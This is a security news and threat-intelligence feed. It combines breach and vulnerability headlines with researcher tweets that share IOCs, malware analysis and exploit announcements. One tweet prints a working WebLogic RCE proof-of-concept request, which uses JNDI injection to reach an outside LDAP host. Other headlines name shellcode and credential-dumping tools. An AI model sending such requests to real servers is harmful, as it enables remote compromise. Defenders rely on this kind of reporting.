ThreatChat ThreatHistory Video Feed

TikTok Flaw Lay Bare Phone Numbers, User IDs For Phishing Attacks

Outgoing FCC Chair Issues Final Security Salvo Against China

2.28M MeetMindful Daters Compromised in Data Breach

Breaking Down Joe Biden's $10B Cybersecurity 'Down Payment'

Cisco DNA Center Bug Opens Enterprises to Remote Attack

SonicWall Breach Stems from 'Probable' Zero-Days

Microsoft Edge, Google Chrome Roll Out Password Protection Tools

Amazon Kindle RCE Attack Starts with an Email

NVIDIA Gamers Face DoS, Data Loss from Shield TV Bugs

Attackers Steal E-Mails, Info from OpenWrt Forum

Malwarebytes Hit by SolarWinds Attackers

Linux Devices Under Attack by New FreakOut Malware

Investment Scammers Prey on Dating App Users, Interpol Warns

CISOs Prep For COVID-19 Exposure Notification in the Workplace

From Triton to Stuxnet: Preparing for OT Incident Response

How the Pandemic is Reshaping the Bug Bounty Landscape

305 CVEs and Counting: Bug-Hunting Stories From a Security Engineer

Most-Wanted Threatpost Stories of 2020

Dark Web Pricing Skyrockets for Microsoft RDP Servers, Payment-Card Data

Record Levels of Software Bugs Plague Short-Staffed IT Teams in 2020

Pandemic, A Driving Force in 2021 Financial Crime

ThreatList: Cyber Monday Looms – But Shoppers Oblivious to Top Retail Threats

A Look Ahead at 2021: SolarWinds Fallout and Shifting CISO Budgets

Simplifying Proactive Defense With Threat Playbooks

Cyber Monday is Every Monday: Securing the 'New Normal'

'Amnesia:33' TCP/IP Flaws Affect Millions of IoT Devices

DNS Filtering: A Top Battle Front Against Malware and Phishing

Smart Doorbells on Amazon, eBay, Harbor Serious Security Issues

Cybercriminals Batter Automakers With Ransomware, IP Theft Cyberattacks

Patrick Wardle on Hackers Leveraging 'Powerful' iOS Bugs in High-Level Attacks

Ransomware and IP Theft: Top COVID-19 Healthcare Security Scares

Experts Weigh in on E-Commerce Security Amid Snowballing Threats

Cybercriminals Step Up Their Game Ahead of U.S. Elections

A Cyber 'Vigilante' is Sabotaging Emotet's Return

Black Hat USA 2020: Critical Meetup.com Flaws Reveal Common AppSec Holes

Encryption Under ‘Full-Frontal Nuclear Assault’ By U.S. Bills

Chris Vickery: AI Will Drive Tomorrow’s Data Breaches

2020 Cybersecurity Trends to Watch

Top Mobile Security Stories of 2019

Facebook Security Debacles: 2019 Year in Review

Biggest Malware Threats of 2019

Top 10 IoT Disasters of 2019

2019 Malware Trends to Watch

Top 2018 Security and Privacy Stories

2019: The Year Ahead in Cybersecurity

2018: A Banner Year for Breaches

Critical Vulns Discovered in Vendor Implementations ...

SonicWall Is Latest Security Vendor to Disclose ...

Deloitte & Touche Buys Threat-Hunting Firm

Small Security Teams Have Big Security Fears, CISOs ...

How to Better Secure Your Microsoft 365 Environment

2020's COVID Accelerated Digitalization Demands ...

Comparing Different AI Approaches to Email Security

Intel Confirms Unauthorized Access of ...

Speed of Digital Transformation May Lead to Greater ...

How Cybersecurity Newbs Can Start Out on the Right Foot

Why North Korea Excels in Cybercrime

DreamBus, FreakOut Botnets Pose New Threat to Linux ...

Breach Data Shows Attackers Switched Gears in 2020

Attackers Leave Stolen Credentials Searchable on Google

Cloud Jacking: The Bold New World of Enterprise ...

7 Steps to Secure a WordPress Site

Hacker Pig Latin: A Base64 Primer for Security Analysts

Rethinking IoT Security: It's Not About the Devices

Microsoft Releases New Info on SolarWinds Attack Chain

SolarWinds Attack, Cyber Supply Chain Among ...

Beware of this active UK NHS COVID-19 vaccination phishing attack

Beware of this active UK NHS COVID-19 vaccination phishing attack

Windows 10 NTFS corruption bug gets unofficial temporary fix

ProtonVPN causes Windows BSOD crashes due to antivirus conflicts

North Korean hackers are targeting security researchers with malware, 0-days

North Korean hackers are targeting security researchers with malware, 0-days

Google fixes severe Golang Windows RCE vulnerability

Google fixes severe Golang Windows RCE vulnerability

TikTok fixes flaws allowing theft of private user information

TikTok fixes flaws allowing theft of private user information

Leading crane maker Palfinger hit in global cyberattack

Leading crane maker Palfinger hit in global cyberattack

Australian securities regulator discloses security breach

Australian securities regulator discloses security breach

Ransomware gang taunts IObit with repeated forum hacks

Ransomware gang taunts IObit with repeated forum hacks

Microsoft shares workaround for Windows 10 Conexant driver issues

Data breach at Buyucoin crypto exchange leaks user info, trades

Data breach at Buyucoin crypto exchange leaks user info, trades

Another ransomware now uses DDoS attacks to force victims to pay

Another ransomware now uses DDoS attacks to force victims to pay

Windows 10X feature will prevent unauthorized factory resets

SonicWall firewall maker hacked using zero-day in its VPN device

SonicWall firewall maker hacked using zero-day in its VPN device

Russian government warns of US retaliatory cyberattacks

Russian government warns of US retaliatory cyberattacks

Facebook users were mass-logged out Friday by configuration change

The Week in Ransomware - January 22nd 2021 - Calm before the storm

The Week in Ransomware - January 22nd 2021 - Calm before the storm

SAP SolMan exploit released for max severity pre-auth flaw

SAP SolMan exploit released for max severity pre-auth flaw

Mastercard Introduces Quantum-Resistant Specs to Enhance Contactless Security

TikTok Bug Gave Access to Contacts’ Profile Details

Cook County Leaks 320,000 Court Records

Misconfigured Cloud Server Exposes 66,000 Gamers

Mr. Double Website Operator Convicted

San Francisco Law Firm Investigating PupBox Data Breach

Deloitte Acquires Root9B

Russian Government Agency Warns Firms of US Attack

Automated Change: Fulfilling Network Security Requirements

FTP, FTPS & SFTP

How to Secure Data in Your Organization

2020 Cybersecurity Headlines in Review

Risk-Based Security for Your Organization

Secure Access: Anywhere, Any Device and Any Application

Tales from the Insider Crypt: The Evolution of Insider Risk Maturity

Putting People First: Overcome Human Error in Email Security

How to Mitigate Insider Security Risks in the Current Landscape

Enabling Incident Response in a Remote Working Landscape

Behind the Scenes of a Live DDoS and BOT Attack: Launch and Mitigation

No Perimeter, No Problem: Crypto-Strategy for a Zero-Trust Future

Trump Sex Scandal Video Is a RAT

SonicWall Probes Attack Using Zero-Days in Own Products

Intel: Earnings Leak Down to Internal Error

2021: The Year Zero Trust Overtakes VPN?

Becoming a Next-Gen CISO: Leading from the Front

The Top Five Data Security Metrics

Taking the First Steps Toward Self-Repairing Endpoints

New Cyber-attack Advice for European Hospitals

Home Security Technician Admits Spying on Customers

Court Date for Woman Accused in Theft of Pelosi’s Laptop

Defense More Effective Than Offense to Curb Nation State Threat Actors

ICO Urged to Investigate Secretive Tory Party Consultancy

Human Error to Blame as Exposed Records Top 37 Billion in 2020

Government Laptops May Contain Additional Malware, Warn Experts

Speed of White House cyber appointments should make CISOs 'a bit more confident'

Users of IoT products from three major vendors at risk of DDoS attacks, data leaks

Does cybersecurity need its own Fauci?

SonicWall network attacked via zero day in its secure access solution

In second attack, DDoS group demands 5 bitcoin payment

Sunburst avoided indicators of compromise with SolarWinds hack, but left breadcrumbs

Sheldon Cuffie: ‘Maintain an unrelenting curiosity’

Cybersecurity Collaborative launches Asset Management Task Force

Todd Fitzgerald: ‘Do not expect trust. It must be earned’

How to Address Your Biggest Risk: Extend User Security Beyond Training and Education

Watch now: What to expect from cybercriminals in 2021

Can CISOs learn to do more with less?

Today’s security threats require a bold, new ‘Triple Zero’ mindset

Managing identities has become the first line of defense

2021 to bring 'phase two' of remote access investment for enterprises

New cyber council tackles infosec challenges from tech perspective

Hackers accessed corporate networks via hijacked cloud accounts

Thousands of BEC lures use Google Forms in recon campaign

70% of apps for the manufacturing sector spent all of 2020 with at least one security flaw

CISA launches ransomware education program

Google: North Korean hackers have targeted security researchers via social media

The history of the connected battlespace, part one: Command, control, and conquer

Former LulzSec Hacker Releases VPN Zero-Day Used to Hack Hacking Team

Dutch COVID-19 patient data sold on the criminal underground

Red Hat Security Advisory 2021-0247-01

Red Hat Security Advisory 2021-0246-01

Ubuntu Security Notice USN-4703-1

Red Hat Security Advisory 2021-0248-01

Red Hat Security Advisory 2021-0250-01

Red Hat Security Advisory 2021-0245-01

Red Hat Security Advisory 2021-0240-01

Backdoor.Win32.DarkKomet.bhfh Insecure Permissions

AIDE 0.17

Logwatch 7.5.5

MobileIron MDM Hessian-Based Java Deserialization Remote Code Execution

PEAR Archive_Tar Arbitrary File Write

Ubuntu Security Notice USN-4702-1

Gentoo Linux Security Advisory 202101-21

Backdoor.Win32.Wollf.16 Hardcoded Password

Gentoo Linux Security Advisory 202101-20

Trojan.Win32.Xocry.ff Insecure Permissions

Library System 1.0 SQL Injection

Gentoo Linux Security Advisory 202101-19

Backdoor.Win32.Jokerdoor Insecure Permissions

Gentoo Linux Security Advisory 202101-18

Gentoo Linux Security Advisory 202101-17

Linux/x64 Bindshell With Password Shellcode

Backdoor.Win32.Noknok.50 Insecure Permissions

Gentoo Linux Security Advisory 202101-16

DreamBus botnet targets enterprise apps running on Linux servers

DDoSers are abusing Microsoft RDP to make attacks more powerful

ADT Tech Hacks Home-Security Cameras to Spy on Women

SonicWall says it was hacked using zero-days in its own products

After big hack of U.S. government, Biden enlists 'world class' cybersecurity team | Reuters

Bugs Allowed Hackers to Hijack Kindle Accounts With Malicious Ebooks

Hackers publish thousands of files after government agency refuses to pay ransom

New website launched to document vulnerabilities in malware strains

Google Searches Expose Stolen Corporate Credentials

Malware found on laptops given out by government

Apps Don’t Live Forever. Maybe it’s time to put aside aging… | by Lance Ulanoff | Dec, 2020 | Medium

Lance Ulanoff – Medium

Google's GCLB doesn't comply with RFCs. Why Google doesn’t validate some certs | Google Cloud - Community

Where is my GKE master?. Different ways to access your GKE… | by Julio Diez | Google Cloud - Community | Dec, 2020 | Medium

A DMZ, what is that?. How to translate DMZ concept to GCP | by Julio Diez | Google Cloud - Community | Dec, 2020 | Medium

The Danger Of Storing Data In Clear Text In Main Memory | by Vince Tabora | The InfoSec Journal | Jan, 2021 | Medium

The InfoSec Journal – Medium

Stop Requiring P@55w0rDz!. Start using and designing for… | by Mario Noble | The Startup | Jan, 2021 | Medium

Prifina’s Comments on the Proposed CCPA Regulations (Oct. 2020) | by Paulius Jurcys | Prifina | Medium

A Beginner Guide to DNS Security At Home for Free | by Zen Chan | Technology Hits | Jan, 2021 | Medium

WhatsApp Doesn’t Read Your Messages, It Doesn’t Need To | by Pen Magnet | The Startup | Jan, 2021 | Medium

React Authentication: How to Store JWT in a Cookie | by Ryan Chenkie | Medium

New campaign targeting security researchers

New campaign targeting security researchers

GitHub - preludeorg/pneuma: Default agent for Prelude Operator

GitHub - moonD4rk/HackBrowserData: Decrypt passwords/cookies/history/bookmarks from the browser. 一款可全平台运行的浏览器数据导出解密工具。

Understanding People Part 12: Inability to Change - YouTube

WestRock Reports Ransomware Incident | Business Wire

Insider Attack on Home Surveillance Systems - Schneier on Security

HACKING DEFCON with a URINAL CAKE - YouTube

Passwordless authentication: Has it killed the password? - Tech Monitor

Detailed Audit of Voatz' Voting App Confirms Security Flaws

Hacker leaks data of 2.28 million dating site users | ZDNet

COVID-19 Cyber Attacks - WebARX Security

New campaign targeting security researchers

PANDORABOX - North Koreans target security researchers – Comae - The Future Of Cybersecurity

Gunfight North St. Louis Dec 27, 2020 - YouTube

#14 Warded locks shown, opened with Sparrows Warded Pick Set and Bonus locks - YouTube

Sql Injection via hidden parameter | by Rutvik | Jan, 2021 | Medium

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps

[17] Den Brass "Roller" Picked and Gutted - YouTube

MEDECO Biaxial 51S (6 pins) 😁 picked and gutted 👌 - YouTube

GitHub - CompassSecurity/security_resources: Collection of online security resources

North Korean Hackers Infecting Security Researchers With a Backdoor Malware

Google exploring using location info to slow coronavirus spread

The U.S. wants smartphone location data to fight coronavirus. Privacy advocates are worried.

Stop the EARN IT Bill Before It Breaks Encryption | EFF Action Center

Assa Twin Exclusive Picked and Gutted - YouTube

All You Need to Know About Continuous Security Validation

Bugtraq: On Second Thought...

Schlage D145 Key Creator by Dreadpirateyarr - Thingiverse

VisualDoor: SonicWall SSL-VPN Exploit – Darren Martyn

34: New Products - YouTube

Man caught on Ring camera snooping around. - YouTube

Twenty-three SUNBURST Targets Identified - NETRESEC Blog

Windows 7 TCP/IP hijacking : pi3 blog

Vadokrist: A wolf in sheep’s clothing | WeLiveSecurity

virusbtn: CSIS researchers and regular VB conference speaker @benkow_ analysed the affiliate model behind the Nemty ransomware, which ceased operations last spring https://t.co/EusO267VPW https://t.co/8OL0FgNGTk

virusbtn: The Cyber Geeks performed a detailed analysis of the Elmer backdoor, used by the China-linked APT16 group https://t.co/BdH4ovvynk https://t.co/oAPFwKF5mq

virusbtn: Trend Micro researchers analyse an Office 365 phishing campaign that has been targeting C-level accounts since May last year https://t.co/I8Bt55QIrG https://t.co/NIS3yKgZLt

virusbtn: Security researchers continue to study the SUNBURST malware campaign. @VriesHD has decrypted tens of thousands of subdomains used in the campaign https://t.co/ExLsOCsLi2 https://t.co/Q5DDSa4d1C

virusbtn: SonicWall says the company was hacked through a zero-day vulnerability in one of its own products https://t.co/9Ree6OPIWR https://t.co/ycfjwH6NuO

MITREattack: Don't forget to join @jamieantisocial & @redcanary today at 1PM ET for a 30-minute live event (and interactive detection challenge!) covering strategies for understanding and detecting adversary WMI-abuse. Sign up at https://t.co/DNorrnSDU4! https://t.co/QwQYCUcoob

SpecterOps: CORRECTION: We are hosting our Red Team Operations (Mar 23-26), Vulnerability Research for Operators (Mar 29-30), and Mac Tradecraft (Mar 31-Apr 1) courses coming up soon. Sign-up links are available here: https://t.co/vgSHK78qaI

TalosSecurity: New Snort virtual meeting backgrounds! https://t.co/YZis5bZF46

TalosSecurity: Talos Takes is back after our winter break! We return with a new episode covering the basics of supply chain attacks and how this isn't the first, nor the last, after #SolarWinds https://t.co/c3tHaU5uQF https://t.co/xFTXHTwtYv

TalosSecurity: We know it's hard to look at any news that's related to Washington at this point, but that doesn't mean the cyber world was quiet this week. Catch up on everything with the Threat Source newsletter https://t.co/MXx8Mf7rTS https://t.co/IewgxUqGRo

TalosSecurity: We are hiring for several positions across different Talos teams. Check out our Careers page (and come back regularly for new postings) to join our groundbreaking organization https://t.co/Z3we6oy6zE https://t.co/3oNSXVfHIV

anyrun_app: TOP10 last week's threats by uploads ⬆️ #Emotet 1547 (954) ⬇️ #NjRAT 282 (320) ⬆️ #FormBook 206 (161) ⬆️ #Remcos 157 (134) ⬆️ #Nanocore 142 (124) ⬆️ #Lokibot 135 (129) ⬆️ #AgentTesla 102 (77) ⬆️ #AsyncRAT 101 (97) ⬆️ #Dridex 97 (39) ⬇️ #Redline 49 (79) https://t.co/98nRpXOxWw

anyrun_app: The service is operational again.

anyrun_app: There are some problems in the data center, we are looking into this. The service has temporarily switched to read-only mode. We will notify you as soon as everything is operational.

abuse_ch: @ffforward eh 😄 ... or our IPs have been blocked by the TA

abuse_ch: @ffforward They all return HTTP 200 with 0 bytes, which is why they are flagged as offline. What kind of content do you get?

abuse_ch: @FrPhishing @SwissPost_CERT Thanks, seeing many of those these days. Threat actor is from Tunisia it seem (and hence outside the reach of western LEA)

abuse_ch: Did you know what the U.S. 🇺🇸 is hosting most of the active Emotet malware sites world wide and that Google Cloud is responsible for 17% of those? Time to clean up the mess! 🧹🪲 👉 https://t.co/DSARIaelFA https://t.co/ftqnfykGYW

QuoIntelligence: Read about #Malwarebytes #supplychain attack & its significant connection to the #SolarWinds breach. Besides, we've noticed a worldwide increased effort on developing frameworks for supply chain security & resilience. More here: https://t.co/Xbg91ZStOL

JAMESWT_MHT: #VelvetSweatshop Xlsx caught today by @abuse_ch https://t.co/PlK3iJ1roi Spread #Formbook /#Lokibot Urls https://t.co/IDTZ2Z7DDc https://t.co/sOAOvy85Rd Run https://t.co/mOISorT1B6 https://t.co/UXJ02mnDdN cc @malwrhunterteam @verovaleros @lazyactivist192 @Jan0fficial @cocaman https://t.co/0yLlpG2Nt4

JAMESWT_MHT: https://t.co/rUZDA3h1RS 😉 https://t.co/SlJYyxUqCg

cyb3rops: @fr0gger_ @virustotal Better include a link in such a tweet

cyb3rops: That's an interesting PE signature date - it was signed in the future when it was uploaded. Looking at the "Signers" section, this could be a display bug on VT. https://t.co/ycE4wnDvZa

cyb3rops: I found another sample that looks very similar to the samples mentioned on Lazarus activity against security researchers as reported by TAG https://t.co/BUdEliHwLo https://t.co/p5ODoGvvjj

cyb3rops: @campuscodi Advice: Don’t accept direct messages from everyone - it turns down the noise and makes them ask you in public to follow them back (which I use for a short background check; number of followers, LinkedIn history and connections etc.) https://t.co/CsiZ2CpKFv

RedDrip7: Seems another sample from #Lazarus Group with invalid sig "2 TOY GUYS LLC".In September 2020,we disclosed a #Lazarus campaign whice used the same C2:www[.]fabioluciani[.]com Our Report: https://t.co/SgubBJK3Mo https://t.co/zuGqAbVJ5I https://t.co/m3kPoQU5mz https://t.co/2zpcRZ6ksh

inj3ct0r: #0daytoday #Linux/x86 - Socat Bind #Shellcode (113 bytes) https://t.co/FHMndMeacT

inj3ct0r: #0daytoday #Linux/x64 Reverse #Shell #Shellcode (123 bytes) https://t.co/GdDeHOQAkP

inj3ct0r: #0daytoday #VotingSystem 1.0 - File Upload Remote Code Execution (Authenticated) #Exploit #shell #RCE https://t.co/Yyn4QRq8cE

inj3ct0r: #0daytoday #Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored #XSS #Vulnerability https://t.co/juC7k7RGL3

inj3ct0r: #0daytoday #ChurchRota 2.6.4 - Remote Code Execution (Authenticated) #Exploit #RCE https://t.co/sMG5mfErUu

malwrhunterteam: 👀 https://t.co/bVB28z3Bpo

malwrhunterteam: 3.96.207[.]96 syncjquery.[us].to codejquery.[uk].to cc @VK_Intel @bryceabdo @JAMESWT_MHT https://t.co/B9u7ZVaBNI

malwrhunterteam: @500mk500 @VK_Intel @bryceabdo @JAMESWT_MHT Yes, I was thinking to tweet that too, but looks old enough so not spent time on that...

malwrhunterteam: "dns-beacon.exe": da5242d0a0aa898170b5146baa8e275f99f27aa1d6d65b58f7aa1df844b63745 godie[.]work 🤔 cc @VK_Intel @bryceabdo @JAMESWT_MHT https://t.co/cAib8XFKFW

blackorbird: #Lazarus Campaign Targeting Security Researchers #APT #SocialEngineering "dxgkrnl_poc" Visual Studio Project Analysis Report: 1. https://t.co/0eoRRQQIi5 2. https://t.co/0qomqY69hO Attribution: https://t.co/XMlkH0Vp0r ref: https://t.co/kLizS9Kuo4 https://t.co/uIsE4JKAvp

blackorbird: The campaign is mainly aimed at security researchers who will release the vulnerable poc. My friends have also received it. Please pay attention to your safety! https://t.co/Piq6atf0jG

blackorbird: https://t.co/6wiB7dlpoz

blackorbird: DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) exploit https://t.co/ianD1toRlI report https://t.co/yjLmvuZj9o https://t.co/dShkZ4P2Yx

blackorbird: Transition from Solorigate backdoor to [TEARDROP and Raindrop] -> Cobalt Strike #Solarwinds #Update report: https://t.co/9YJD3JR4rb https://t.co/8fqymnOXT2 https://t.co/aZLwzAF9X8

wugeej: #Oracle WebLogic Server RCE (CVE-2021-2109) [PoC] GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;[Semicolon]👈10:1389/5r5mu7;AdminServer-) https://t.co/S875IxhzFa https://t.co/h2REYhG9Yj

malware_traffic: 2021-01-25 (Monday) - More #TA551 (#shathak) Word docs pushing #Qakbot, so I guess this actor has given up on IcedID. Doc: https://t.co/9UxwNpdM5j DLL: https://t.co/IpV2JosPA5 https://t.co/4kKU2B829g

malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so I couldn't open the attached zip archive. LOL, Ivan! - Message available at: https://t.co/fueJRpOwp0 https://t.co/o6BBA3qcKf

malware_traffic: @secprentice That's why I do it. I have the message chains on email clients on the hosts I infect with Emotet. Emotet then exports that data out to the botnet. That data is used to create fake replies to the stolen Emotet chains. https://t.co/scm3iHZQGI

malware_traffic: 2021-01-22 (Friday) - #TA551 (#shathak) is back for the new year, but now it's pushing #Qakbot (#Qbot) malware instead of IcedID - Paste of info: https://t.co/JxQsmPI8sK - Pastebin raw: https://t.co/nwuRClgacw https://t.co/mALRcnIecE

malware_traffic: 2021-01-22 (Friday) - #Emotet #epoch1 infection with #spambot activity - Still working on sanitizing/carving traffic for the #pcap(s), but I exported 41 emails from unencrypted SMTP traffic and posted them at https://t.co/7CSK1hyqMX - I'll update that blog post if I have time. https://t.co/IucQ9FYw9Z

James_inthe_box: @fr0s7_ @JAMESWT_MHT @malwrhunterteam @FBussoletti @Arkbird_SOLG @sugimu_sec @Jan0fficial 🤔 https://t.co/AAHahCbQqk

James_inthe_box: @fr0s7_ @JAMESWT_MHT @malwrhunterteam @FBussoletti @Arkbird_SOLG @sugimu_sec @Jan0fficial Confirming #parallaxrat https://t.co/1xjfrtDIPL

James_inthe_box: @JAMESWT_MHT @malwrhunterteam @FBussoletti @Arkbird_SOLG @sugimu_sec @fr0s7_ @Jan0fficial Sectigo...shocking...

James_inthe_box: @ffforward @abuse_ch @CloudflareAbuse @xxdesmus @matthewgall @executemalware @malware_traffic Nothing on this end yet.

pmelson: @jfslowik The Unplugged / Yo MTV Raps crossover concert was incredible. https://t.co/6A6RdIpTA0

pmelson: This is table stakes for adulthood. https://t.co/32umT7gTXJ

pmelson: @mathew_dev https://t.co/qp0Nn61tV4

pmelson: A little Larceny and a lot of ice in my spiffy new rocks glass courtesy of @jayl0w’s team of scary octopuses. https://t.co/mVHuUM5nOm

pmelson: @PJ47596176 Oooh! It’s on my list now.

demonslay335: @GrujaRS Also, the victim ID is hardcoded in the ransom note it downloads from a Discord CDN.

demonslay335: @GrujaRS Just wow... so it's _basically_ based on HiddenTear with a twist: they encrypt files with AES, then AGAIN with an attempt at what they call a "custom RC4" implementation that uses a larger state matrix. https://t.co/XqwJ2r5mkO

hackerfantastic: 0wn3d, attackers were actively engaged in the security research community for almost a year and secretly popping researchers with a Chrome 0day https://t.co/wzh2hJMUvU

VK_Intel: 2021-01-25:🆕#REvil #Ransomware Debug Version 2.0.3 Jan 11, 2021 "ver":515,"sub":"6545" 1⃣To reach more target files for encryption: SetEveryoneAccess(...)➡️SetEntriesInAcl(...) API 2⃣'FakeGetProcAddress' to get the address of an exported function from DLL h/t @malwrhunterteam https://t.co/OHJhPCdn8i

securitydoggo: Picking everyone's brain: what are your must-have #EDR features? Aside from the obvious, an easy to use querying system across all endpoints would be #1 for me. #cyber #infosec #endpoints

DrunkBinary: @jfslowik NYT Theory of Russian DevOps https://t.co/Gk24w9HsU9

DrunkBinary: @PDXbek @rickhholland @meansec @BrianPKime @Ch33r10 @likethecoins @NicoleBeckwith @TheVega @jfslowik @Dragonkin37 @RobertMLee @selenalarson @asfakian Not on a TDY budget

DrunkBinary: @NicoleBeckwith @RobertMLee @BrianPKime @likethecoins @rickhholland @Ch33r10 @TheVega @jfslowik @Dragonkin37 @selenalarson @asfakian lol small and quiet don't really apply to this group

DrunkBinary: @BrianPKime @likethecoins @rickhholland @NicoleBeckwith @Ch33r10 @TheVega @jfslowik @Dragonkin37 @RobertMLee @selenalarson @asfakian Samesies, there will always be next year...and DISC https://t.co/T9FAQxRXWU

Arkbird_SOLG: This have a recent sample that looks like Lazarus, uploaded today in VT (only in VT)😉 https://t.co/rpZtti42qR https://t.co/BuvimnWig1

KorbenD_Intel: Voyager 2 uses IPv6 but we still don't. ;) https://t.co/EfPBhbUugl

ShadowChasing1: Another sample of this compaign which belongs to #Lazarus #APT group ITW:7FC2AF97B004836C5452922D4491BAAA filename:Browse .VC.db C2:angeldonationblog[.]com https://t.co/77efJjnmm3 https://t.co/lBDOdZchq5

ShadowChasing1: @BushidoToken Nice hunt https://t.co/MUFWpvCbpX

ItsReallyNick: @likethecoins @russmcsec @jfslowik 😍 this visual representation of “Pivoting from Art to Science” – @jfslowik as illustrated by @MindsEyeCCF at the #CTISummit https://t.co/YKucJ7KniG

ItsReallyNick: @devinmclean @SteveSyfuhs @CISAgov Should you still want to sift for evil based on the lower fidelity UserAuthenticationMethod 16457, we proposed some Solorigate TTP-specific mods: https://t.co/y4KrIOHL00 I understand the Azure AD method flags aren’t in UAL (or MCAS or Sentinel) events after Oct 31, 2020 anyway🤷🏻‍♂️ https://t.co/NPdpEq8p15

cyberwar_15: #북한 #Northkorea #Cyberwar #Attack 민간단체를 사칭한 북한의 공격 사례입니다. 해당 공격은 이전에 미국 대북제재, 선거관리위원회, 자유북한운동연합, 네이버/한메일 고객센터 등을 사칭한 공격과 연결됩니다. https://t.co/ECUhDo1rbE https://t.co/pz2iD4UJJb

cyberwar_15: #북한 #Northkorea #연말정산 #Cyberwar #탈륨 #Thallium https://t.co/dg0NltuqWn

cyberwar_15: #북한 #NorthKorea #PDF #Cyberwar 북한은 PDF 첨부파일 링크를 통해 개인정보 해킹 시도를 수행합니다. https://t.co/IjGxf9bF80

cyberwar_15: 121.78.88.85 https://t.co/h9Znoivicf

cyberwar_15: #북한 #NorthKorea #Naver #Hanmail #CyberWar 북한 사이버 공작원은 한국 이용자 대상으로 공격시 네이버와 한메일 조건에 따라 각기 다르게 설정해 공격하고 있습니다. 2개의 서버는 다음과 같습니다. 모두 차단하시길 바랍니다. 네이버 : naver.servehttp[.]com 한메일 : attach.ddns[.]net https://t.co/zG5Rr5OBDi

58_158_177_102: 昼ラー (忘れていた) https://t.co/0cEDneGmAq

issuemakerslab: In 2016, the South Korean military was occupied by North Korea's cyberattacks. At that time, the head of the cyber center was disciplined for failing to prevent the attack. He sued and won the case for unfairness. https://t.co/iutxgQjVPo

issuemakerslab: North Korea's RGB-D5 is still successful in spear-phishing attacks in the new year. They make up many phishing servers and are attacking various victims in South Korea. https://t.co/zlNeNoHqNB

IntezerLabs: Samples from a recent @Google report about NK campaign targeting security researchers (including 0day vulnerabilities) share code with previous FALLCHILL samples 🇰🇵 https://t.co/31gST672QN https://t.co/Tn84N8VWcH

IntezerLabs: Recent attacks have shown that cryptominers like XMRig will find their way into the production environment. Swat them away in runtime https://t.co/JGGy3umEgg

IntezerLabs: 🐧 Rekoobe [d35657a79c7e0d3ab1fe589f5e8088a1] 🐧 XMRig Miner [befa8b0959809739a6a52bdf9836c8e4] 🐧 Mirai [de1bbb1e4a94de0d047673adaed080c1] 3 Linux threats missed by most security solutions. Get next week's full list of hashes sent to your inbox https://t.co/oTPk2j490C https://t.co/eK13zVfrt1

IntezerLabs: Check your Linux and Windows machines for infection #ElectroRAT https://t.co/ijIIBLJlQO https://t.co/XHriciEwCg

aboutsecurity: Check out our 1st #SOCWise #LinkedInLive session (15 mins) on supply chain attacks, along with practical advice on how #Blueteam & #AllAroundDefenders can spot the presence of the adversary looking at behaviors across the attack timeline: https://t.co/S5pTXlWrSi #MCFE #McAfee https://t.co/y2UUpKFF5z

aboutsecurity: We will be live in 15 mins! https://t.co/GZ4ZzLETVW

aboutsecurity: @ciyinet @lostinsecurity @marimarjimenez Enhorabuena David! Bien merecido. Espero poder verte pronto por aquí ;)

aboutsecurity: @NuriaTriguero @chocotuits Para cuando el club de malagueños en #NewYork (y alrededores)? 😄👏🏼👏🏼

kyleehmke: service1go[.]com (108.62.12[.]189) service1helps[.]com (108.62.12[.]19) service1updates[.]com (108.62.12[.]183)

kyleehmke: Another set from earlier in January: drive-dwn[.]com (108.62.12[.]186) drive-upd[.]com (108.62.12[.]187) drive1upd[.]com (108.62.12[.]162) drive1update[.]com (108.62.12[.]184) service-boosts[.]com (108.62.12[.]209)...

kyleehmke: top-serviceupdate[.]com topbackupupd[.]com (5/5) Info in @ThreatConnect: https://t.co/peC37X0jWs

kyleehmke: backup-updates[.]com (23.106.160[.]205) backup1-online[.]com (23.106.160[.]188) backup1patch[.]com (23.106.160[.]35) servicepatcher[.]com (23.106.160[.]37) topserviceboost[.]com (23.106.160[.]220) topserviceupdate[.]com (23.106.160[.]29) backupupdonline[.]com (4/5)

kyleehmke: best-serviceupd[.]com (194.26.29[.]248) backupupd[.]com (194.26.29[.]247) backupsec[.]com (194.26.29[.]246) backup-boost[.]com (23.106.160[.]233) backup-helps[.]com (23.106.160[.]185) backup-monster[.]com (23.106.160[.]209) backup-updater[.]com (23.106.160[.]234) (3/5)

DissectMalware: #XLM macro trace of the #Zloader #maldoc (da61733e71fa28d0e04d55a88ba1b512531a0f3ed56656e4cdd0fef0de7a4452) https://t.co/lH51cKKpb3

DissectMalware: With a little hack, #xlmdeobfuscator can now #deobfuscate the latest #zloader docs with ease (not pushed) Spent hours & hours to deobfuscate recent samples manually, find bugs in the emulator, and fix them. Stay tuned 4 xlmdeobfuscator v0.1.7 Video: https://t.co/DeEBdMcTBf https://t.co/swbeoYP0Qa

DissectMalware: @cocaman @ffforward @JAMESWT_MHT @James_inthe_box @lazyactivist192 @GossiTheDog Two layers of XLM macro obfuscation I manually deobfuscated the macro, you can find it here: https://t.co/XMlffT0Tzg Dumps vba: C08AFD90-F2A1-11D1-8455-00A0C91F3880 -> ShellBrowserWindow ShellBrowserWindow.Document.Application.ShellExecute https://t.co/RPpO0wkJuu

DissectMalware: @Ledtech3 @ffforward @James_inthe_box @emd3l @InQuest @pmelson @Malwageddon vba*

Hexacorn: @richinseattle @z0x55g that sys has a time stamp 2020-09-18 22:53:15 (Friday) it's been a while then ? and from cursory check - rc4 key (one of, as there seem to be some in the Registry?)? v24[0] = 0x8C2DB7B6; v24[1] = 0xDF145F6B; v24[2] = 0x73A138B1; v24[3] = 0xC4D2C189;

Hexacorn: @richinseattle ^--- this twit goes to so many presos this year :-P

Hexacorn: and this is why... https://t.co/wCkF4Qwvbv

JCyberSec_: 💰PayPai 🌐hxxps://www.paypai.com.se/ Using a WordPress contact form as exfil: paypai[.]com[.]se/wp-json/contact-form-7/v1/contact-forms/18/feedback 😂 https://t.co/3UH4jMca9i

